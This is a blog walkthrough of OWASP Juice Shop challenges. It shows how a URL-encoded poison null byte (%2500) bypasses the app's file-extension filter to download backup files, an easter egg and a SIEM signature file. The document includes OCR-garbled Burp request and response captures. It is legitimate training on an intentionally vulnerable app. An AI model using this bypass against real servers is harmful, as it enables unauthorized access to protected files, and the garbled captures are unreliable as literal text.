Hacking OWASP’s Juice Shop Pt. 38: Poison Null Byte + 4 Others

Challenge 1: 

Name: Poison Null Byte

Description: Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.

Difficulty: 4 star

Category: Improper Input Validation

Expanded Description: https://pwning.owasp-juice.shop/part2/improper-input-validation.html

Challenges 2-5: 

Name: Easter Egg, Forgotten Developer Backup, Forgotten Sales Backup, and Misplaced Signature File

Tools used:

Burp, FoxyProxy

Resources used:

URL Encoding Table

Methodology:

The Poison Null Byte challenge is one of my favorites, because it’s such a simple trick that opens up so many seemingly closed doors on the FTP page. First, we need to know what the restrictions are on what we can and can’t download.

<img src="https://curiositykillscolby.files.wordpress.com/2020/11/image-144.jpeg?w=392&quot; alt="Response Headers Raw Render Pretty Actions V H-rrp/l.1 403 Forbidden Access-Cont rol -Allow-Origin: T -Type-options: nosniff SAMEORIGIN Feature-policy: payment 'self' Content -Type: text 'html; charset=utf-8 7 Vary: Accept -Encoding Date: Thu, OS Nov 2020 GMT Connection: close _O Content -Length: 19 <meta charset='utf-8 > Error: Only . md and .pdf files are allowed!

OK, so only .md and .pdf files can be downloaded. Fair enough. But by using a URL encoded null byte (%2500), it’s possible to bypass this restriction. Basically what we’re doing here is saying “I want file X.gg”, and letting the null byte do two things. First, it allows you to add new file extensions to GET requests to bypass the filetype restriction. Second, it serves as a break between the intended filename and any added file extension so that the correct file is downloaded.

The key is to put that URL encoded null byte at the end of the file extension, then add “.md” after it. Then, download all of the things! Seriously, download everything but the quarantined malware. The rest of the images in this post will be which files lead to challenge solutions.

Request 
Params 
Headers 
Actions 
ISON web Tokens 
GET /ftp/eastere.gg%2soo.md HTTP/I.I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 
4 Accept: text 'html , application/xhtml +xml , application/xml ; q=O. 9, image/webp, I/ * ; q=O.8 
-Language: en-lJS, en; q=O.S 
Accept -Encoding: gzip, deflate 
7 Connection: close 
Referer: http•//localhost : 3000/ ftp 
Cookle: language=en; welcomebanner status=dismiss; 
cookieconsent status=dismiss, 
7ShDt mlZsmlJj HZuLhwT4F8fASvt xi Of n SI guzzhveczMfI e SXL SuNqhQEt 4zIIYs9a LVAH8p CSas Vx f mwl 
ey ZXNz1iwi ZGFOYS16eyJpZC16M9 
ESMj Ij o i Y'ARt ah'4iLCJkz,Nx1eGvub2t1 b i 161: 
zxQi oi dG12ZS16dHJ1 
MSOwNSAywozooowNy Awoj Awliwi ZGVsZXR1 ZEF01j f swi ah'F01j ox Nj AONj Azi_cJ 
ehw•wfkifft 7LohedmdUIU74 g82 6mkEU49SZj hG3_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwMd, 
Upgrade-Insecure-Requests
Response 
Headers 
Pretty 
Render 
200 0K 
Actions V 
Access-Cont rol -Allow-Origin: 
X-Content -Type-options: nosniff 
X-Frame-options: SAMEORIGIN 
Feature-policy: payment 
self' 
Accept -Ranges: bytes 
Cache-Cont rot: public, max-age=O 
Last -Modified: Mon, 14 sep 2020 08:01 GMT 
9 ETag: n,' '144-1748ba27d20 
Content -Type: application/ octet -st ream 
Content -Length: 
Il 
324 
Date: Thu, OS Nov 2020 Gl•rr 
12 
Connection: close 
Congratulations, you found the easter eggi 
- The incredibly funny developers 
Oh' wait, this isn't an easter egg at all! It 's just a boring text file! The real easter egg can be found here 
24 
L2d1ci9xcm1 m L 251 ci9mYi9zaGFhbC9ndXJsL3V2cS9uYS9ybmZncmUvcnROL2p2Z3V2YS9ndX1vcmsmZ3J1 
Good luck, egg hunter!
You successfully solved a challenge: Easter Egg (Find the hidden easter egg.) 
You successfully solved a challenge: Poison Null Byte (Bypass a security control with a Poison Null Byte to access a file not meant for your eyes.) 
x 
x
Request 
w Params 
Pretty 
Headers 
Actions v 
ISON web Tokens 
GET /ftp/coupons 2013. mdl HI-rp/l.l 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 
4 Accept: text 'html , application/xhtml +xml , application/xml ; q=O. 9, image/webp, i/ I; q=O.8 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Connection: close 
Referer: http://localhost : 3000/ ftp 
Cookie: language=en; welcomebanner status=dismiss; 
cookieconsent status=dismiss; continueCode= 
xrh3t11vsoioWH2uah9tDTeFmfj sxt Eisf89wYukkhbzc9mf1 y salUXZuE7h xzlb tpPcQa- 
ey ey ZXNz1iwi dxrn cm shbßl_l: 
ESMj Ij o i Y'AR-t bi161i1s1mxhc3RMb2( 
zxQi oi d Gl 2ZS16dHJ1 YXRI ZEF01j oi M: 
MSOwNSAywoz0DowNy 400TYgKz Awoj Awliwi ZGVsZXR1 ZEF01j f 9wi ah'F01j ox Nj AONj EOTAzl_CJ1 e HAi oj E2MDQ2t 
eh"fkifft 7LohedmdUIU74 g82 6mkEU49SZj hGs_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwMd3GZue9 9va2cL[ 
Upgrade-Insecure-Requests
<img src="https://curiositykillscolby.files.wordpress.com/2020/11/image-146.jpeg?w=341&quot; alt="Response Headers P retty Render 200 0K Actions Access-Cont rol -Allow-Origin: X-Content -Type-options: nosniff 4 OX-Frame-options: SAMEORIGIN Feature-policy: payment 'self' Accept -Ranges: bytes Cache-Cont rot: public, max-age=O Last -Modified: Mon, 14 sep 2020 08:01 GMT n,' '83-1748ba27d20 Content -Type: application/ octet -st ream Content -Length: 131 Date: Thu, OS Nov 2020 Gt•rr 12 Connection: close n <MibgC7sn 16 mWS#gC7sn 011VigC7sn 17 k#pDI gC7sn 18 oil] pgC7sn 19 n ( XRvgC7sn 20 n ( XLt gC7sn 21 q:
You successfully solved a challenge: Forgotten Sales Backup (Access a salesman's forgotten backup file.) X
Request 
Raw Params 
Pretty 
Headers 
Actions 
"SON web Tokens 
GET / ftp/package.json.bak%2SOO.md HIT P/ 1.1 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 
4 Accept: text 'html , application/xhtml +xml , application/xml ; q=O. 9, image/webp, q=O.8 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Connection: close 
Referer: http://localhost : 3000/ ftp 
Cookie: language=en; welcomebanner status=dismiss; 
cookieconsent status=dismiss, 
cont 
xrh3t11vsoioWH2uah9tDTeFmfj sxt Eisf89wYukkhbzc9mf1 ysa1uxzuE7hr8t xzlb zowkHSDCNQsJXf 
ey ZXNz1iwi ZGFOYS16eyJpZC16MSW1 
ESMj Ij o i Y'NRt b i 16111 
zxQi oi d Gl 2ZS16dHJ1 
AwliwiZGvsZXR1 ZEF01j pudnxsf9wia',NF01j oxNj AONj EONTAzLCJ1 e 
eh"fkifft 7LohedmdUIU74 g82 6mkEU49SZj hGs_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwMdsc 
Upgrade-Insecure-Requests
Response 
Headers 
PretO' 
Render 
200 0K 
Actions 
12 
Access-Cont rol -Allow-Origin: 
X-Content -Type-options: nosniff 
X-Frame-options: SAMEORIGIN 
Feature-policy: payment 'self' 
Accept -Ranges: bytes 
Cache-Cont rot: public, max-age=O 
Last -Modified: Mon, 14 sep 2020 08:01 GI•TT 
" 114b -1748ba27d20 
Content -Type: application/ octet -st ream 
Content -Length: 4427 
Date: Thu, OS Nov 2020 23: 43:24 Gl•rr 
Connection: close 
'name 
'juice-shop 
6. 2. O- SNAPSHOT' 
version 
'description 
An intentionally insecure JavaScript Web Application 
'homepage 
"http• 
//owasp-juice.shop 
author' 
'8jörn Kimminich owasp.org/index.php/lJser:8j oern Kimminich) 
'cont ributors 
'8jörn Kimminich' 
'8joern Kimminich' 
'bjoern.kimminich' 
'Jannik Hollenbach' 
Aashish683 
greenkeeper[bot]' 
agrawaIarpit14", 
'Ma rcRIer' 
CaptainFreak 
Supratik Das , 
aaryanIO , 
"m411cs , 
' -112934' 
Josh Grossman 
Aashish Singh' 
"Timo Pagel 
scar26 
'Martin Rock-Evans , 
Alejandro Saenz 
omerlh' 
private 
true,
You successfully solved a challenge: Forgotten Developer Backup (Access a developer's forgotten backup file.) X
Request 
Params 
pretty 
Headers 
Actions 
ISON web Tokens 
ET / ftp/suspicious errors.ymI%2SOO. mdl HIT P/ I. I 
Host: local host 3000 
User-Agent: MoziIIa/S.O (X 
11; Linux x86 64; rv. 78.0) Gecko,'20100101 Firefox,'78.o 
4 Accept: text 'html , application/xhtml +xml , application/xml ; 9, image/webp, I/ * ; 
S Accept -Language: en-lJS, 
Accept -Encoding: gzip, deflate 
7 Connection: close 
Referer: http 
// I Ocal host 3000/ ftp 
Cookie: language=en; welcomebanner status=dismiss; 
cookieconsent status=dismiss, 
I xrh3t11vsoioWH2uah9tDTeFmfj sxt Eisf89wYukkhbzc9mf1 ysa1UXZuE7hr8t xzlb zl_twkHSDCNQs 
ZXNz1iwi 
ESMj Ij o i Y'ARt ah'4iLCJkz,Nx1eGvub2t1 b i 16 
zxQi oiliLCJpc0Fj dG12ZS16dHJ1 
MSOwNSAyr•rrozooowNy Awoj Awliwi ZGVsZXR1 ZEF01j p u d',Nxsf9wi ah'F01j ox Nj AONj EOWAzL_c 
eh"fkifft 7LohedmdUIU74 g82 6mkEU49SZj hG3_cxwgADZXAF1tRcs-mX1xhK7VUQZXVr8s0FbM8DwM 
Upgrade -Insecure -Requests
Response 
Headers 
Render 
Pretty 
Raw 
200 0K 
Actions 
Access-Cont rol -Allow-Origin: 1 
X-Content -Type-options: nosniff 
X-Frame-options: SAMEORIGIN 
Feature-policy: payment 'self' 
Accept -Ranges: bytes 
Cache-Cont rot: public, max-age=O 
Last -Modified: Mon, 14 sep 2020 08:01 GI•TT 
9 a-rag: n,' '2ds-1748ba27d20 
Content -Type: text/yaml; charset=UTF- 
I Content -Length: 723 
Vary: Accept -Encoding 
Date: Thu, OS Nov 2020 GMT 
Connection: close 
title: Suspicious error messages specific to the application 
description: Detects error messages that only occur from tampering with or attacking the application 
author: ajoern Kimminich 
logsource 
category: application 
product: nodejs 
service: errorhandler 
detection. 
keywords 
'810cked illegal activity 
with does not exist 
Only files are allowed 
'File names cannot contain forward slashes 
'l_lnrecognized target URL for redirect: I 
828 customer complaints via file upload have been deprecated for security 
'Infinite loop detected 
Detected an entity reference loop 
condition: keywords 
level: low 
reasons
You successfully solved a challenge: Misplaced Signature File (Access a misplaced SIEM signature file.) X

Prevention and Mitigation Strategies:

OWASP Input Validation Cheat Sheet

Lessons Learned: 

Nothing. I’ve always liked the poison null byte, ever since I looked up why the YouTube channel Null Byte (where I spent/spend a lot of time) chose its name.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s